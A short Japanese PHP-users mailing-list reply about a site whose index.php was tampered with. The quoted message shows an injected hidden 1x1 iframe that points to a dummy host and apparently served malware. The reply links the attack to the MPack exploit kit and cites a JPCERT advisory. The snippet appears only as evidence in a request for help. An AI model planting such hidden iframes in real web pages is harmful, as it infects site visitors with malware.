[PHP-users 32361] Re: index.phpに対する、不正な書き換え

Koji Sasaki koji @ f-sasaki.com

佐々木と申します。

> ■先日、自分の管理していたサイトのPHPのスクリプトの一部に、以下のような
> コードが勝手に挿入されてしまいました。
>
> <iframe src='http://dummy/logo/index.php' width='1' height='1'
> style='visibility: hidden;'></iframe>
>
> リンク先のURLはダミーですが、ウイルスをダウンロードさせるためのリンク
> のようです。

複数の脆弱性を使用する攻撃ツール MPack に関する注意喚起
http://www.jpcert.or.jp/at/2007/at070016.txt
の可能性がありますね。